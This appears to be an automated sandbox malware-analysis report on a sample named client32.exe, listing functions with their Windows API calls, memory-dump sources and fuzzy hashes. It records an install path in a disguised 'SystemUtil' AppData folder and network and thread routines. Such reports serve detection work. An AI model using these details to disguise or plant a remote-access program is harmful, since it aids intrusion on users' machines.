                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                                                                                    • String ID: GetModuleFileNameExA
                                                                                                                                                                                                    • API String ID: 4084229558-758377266
                                                                                                                                                                                                    • Opcode ID: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
                                                                                                                                                                                                    • Instruction ID: e23656c5dac0cf9fa05560afcc68164bbb297e952d00726f289e8e4ae625ec2a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e06dd5d842c97300c7436b14705bfa0b554e3e6f288b86d83ee0e19cb0a4a84
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77F08272600218AFC720DF94E804E9B77A8EB48711F40451BFD45D7240C671F810CBF5
                                                                                                                                                                                                    Function 11134C80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                                                                                    • String ID: *AutoICFConfig$Client
                                                                                                                                                                                                    • API String ID: 3257255551-59951473
                                                                                                                                                                                                    • Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                                                                                                    • Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                                                                                                    • Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D
                                                                                                                                                                                                    Function 1106FD70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 1106FDC7
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                                                                                    • String ID: Push
                                                                                                                                                                                                    • API String ID: 1566154052-4278761818
                                                                                                                                                                                                    • Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                                                                                    • Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92
                                                                                                                                                                                                    Function 6859A4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(685DB898,00000000,?,?,?,6859DA7F,?,00000000), ref: 6859A503
                                                                                                                                                                                                    • InterlockedExchange.KERNEL32(?,00000000), ref: 6859A568
                                                                                                                                                                                                    • Sleep.KERNEL32(00000000,?,6859DA7F,?,00000000), ref: 6859A581
                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(685DB898,00000000), ref: 6859A5B3
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 4212191310-0
                                                                                                                                                                                                    • Opcode ID: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
                                                                                                                                                                                                    • Instruction ID: 535f9a0d7001d5bb9c61b1ab5c8456b419707014113600a3913e4554816d070a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9c1538517439e76a5c172e9d6de648db00e5badc440c91aa149d98a85a75a51
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BC21AAB6E00650EFDF129F18C8456DEB7FAEF86315F824417DC65A3240D771A9408B66
                                                                                                                                                                                                    Function 11141430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,75C07310), ref: 11141457
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11141496
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EnvironmentExpandFileModuleNameStrings
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 2034136378-336475711
                                                                                                                                                                                                    • Opcode ID: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction ID: d12c9fbe21fce9ebe84299b8ab088ed5ba47cc188f1fd16cec63c381e0116ac0
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76eb55f7976ca971e771bf37928c8bbd7d03770ae7a3fc3964c2ba1f648ec2b8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90213774E043599BDB11CF68CC44BDAF7785B11708F1482D8D69497142DB707688CBA1
                                                                                                                                                                                                    Function 68595C90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ioctlsocket.WSOCK32(97A234B3,4004667F,00000000,a3Zh), ref: 68595D1F
                                                                                                                                                                                                    • select.WSOCK32(00000001,?,00000000,?,00000000,97A234B3,4004667F,00000000,a3Zh), ref: 68595D62
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ioctlsocketselect
                                                                                                                                                                                                    • String ID: a3Zh
                                                                                                                                                                                                    • API String ID: 1457273030-2278443015
                                                                                                                                                                                                    • Opcode ID: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
                                                                                                                                                                                                    • Instruction ID: f4d72408498c597f28c5e98b0793ceec49d4e0105455f2fa7991f5df7ed328ba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49af2756ad7c3f08683f706b839dd21a2f02366802de171c0ecb246177683335
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 54210E71A003189BEB28DF14C9657EDB7B9EF88305F4081EAA80A97281DB745F94DF90
                                                                                                                                                                                                    Function 11140290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\SystemUtil\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, xrefs: 111402A4, 111402B2
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentFileModuleNameProcess
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
                                                                                                                                                                                                    • API String ID: 2251294070-3916143138
                                                                                                                                                                                                    • Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                                                                                    • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                                                                                                    Function 110151B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileA.KERNEL32(\\.\NSWFPDrv,80000000,00000000,00000000,00000003,40000000,00000000), ref: 110151C7
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110151D8
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseCreateFileHandle
                                                                                                                                                                                                    • String ID: \\.\NSWFPDrv
                                                                                                                                                                                                    • API String ID: 3498533004-85019792
                                                                                                                                                                                                    • Opcode ID: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                                                                                    • Instruction ID: 037b8784f9df01d9315ef50b2b73ebd220fb6a4ab94c0d71800f6b4bfbf8c5f7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58fe6af3b299a8729e671f8465e60fa738919445efc771f3e1e6d14fb593c1fa
                                                                                                                                                                                                    • Instruction Fuzzy Hash: AAD0C971A410347AE23119AAAC4CFCBBD1DDB427B6F310360BA2DE51C4C210485182F1
                                                                                                                                                                                                    Function 111585E0 Relevance: 4.7, APIs: 3, Instructions: 158COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4096691220.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096672888.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096807356.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096848908.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096871958.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4096893357.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _calloc
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1679841372-0
                                                                                                                                                                                                    • Opcode ID: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                                                                                    • Instruction ID: 5870c534f1e9cad6bc1b8df2b52652ede84eef16f18a371c225005308c6cd6aa
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 23d5f42d6a3852595486ea23c8d01e7d0c72e305ebd70d8d3172a527bf914a29
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81519F35600206AFDB90CF59CC80FAABBA5EF8A354F108459ED29DB354D730EA11CBA0
                                                                                                                                                                                                    Function 68598FB0 Relevance: 4.6, APIs: 3, Instructions: 57networkCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _memset.LIBCMT ref: 68598FE4
                                                                                                                                                                                                    • getsockname.WSOCK32(?,?,00000010,?,02D42E90,?), ref: 68599005
                                                                                                                                                                                                    • WSAGetLastError.WSOCK32(?,?,00000010,?,02D42E90,?), ref: 6859902E
                                                                                                                                                                                                      • Part of subcall function 68595840: inet_ntoa.WSOCK32(00000080,?,00000000,?,68598F91,00000000,00000000,685DB8DA,?,00000080), ref: 68595852
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000007.00000002.4097286216.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097266710.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097320746.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097341613.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097364193.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000007.00000002.4097405518.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast_memsetgetsocknameinet_ntoa
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3066294524-0
                                                                                                                                                                                                    • Opcode ID: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
                                                                                                                                                                                                    • Instruction ID: b2f72d1da823fcf21a5055cfacb7210fa2dd74d042b233ef0eeefe23358ff26e
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 61aebbcc04ae2f383672ccbbd03f57b609d181a6114ae28e5313f42125617709
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A4113076E00108AFCB40DFA9DC11AFFB7B8EF89214F41456AEC05E7240E770AE148B95
                                                                                                                                                                                                    Function 687E09A9 Relevance: 4.6, APIs: 3, Instructions: 54memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
